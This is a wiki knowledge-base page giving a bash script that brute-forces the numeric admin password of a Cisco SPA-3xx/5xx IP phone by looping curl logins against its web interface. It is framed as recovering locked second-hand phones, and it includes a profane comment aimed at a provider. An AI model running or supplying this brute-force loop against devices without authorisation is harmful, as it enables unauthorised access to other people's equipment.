User Tools

Site Tools


Sidebar

Welcome

General Policies

Knowledge Base

Provisioning Guides

Firmware Updates

FAQ's

Engineering Docs

kb:tips.and.tricks:cisco.3xx.5xx.brute.force.password.recover

Cisco SPA-3xx or SPA-5xx Brute Force Password Recovery

Save the script (below) as a BASH script on a Linux or Mac machine and use it to determine the password of a locked phone you may have purchased second hand.

NOTE: this script can take SEVERAL days! It works by doing a brute force attack against the phone to discover the password.

Once discovered, the script will record the password on the LAST line in a file it creates while running. The file will be called password.txt.

You can then use this password to unlock and then factory default the phone.

The script requires the LAN IP of the phone and serial number. You set these in two variables in the script before executing. Then have PATIENCE!

#!/bin/bash
#This script was written by John Rogers, K1WIZ.  The intention of this script is to recover the 
#admin password on a Cisco SPAxxx phone when the admin password is not known.  
#
#The script creates a file in the same directory called password.txt and when it finds the correct
#password, it writes it on the last line of the file and then the script dies.   The recovered 
#password can then be used to factory reset the phone.   

# FUCK YOU MEGAPATH FOR LOCKING PHONES!   FUCK YOUUUUU!  

# IP Address of the phone on your LAN
ip='10.0.1.224'
# Serial Number of the Phone you are unlocking
serial='cbt150'

for ((pass=1;pass<=999999;pass++));
do

	flag=`/usr/bin/curl -s --anyauth -u admin:$pass http://$ip/admin/# | grep -i $serial | wc -l`

	if [ $flag -eq 1 ]; then
	echo "password is: " $pass >> password.txt
 	exit 0;
	fi

	echo "it aint" $pass >> password.txt
done
kb/tips.and.tricks/cisco.3xx.5xx.brute.force.password.recover.txt · Last modified: 2021/10/17 19:12 by kg6baj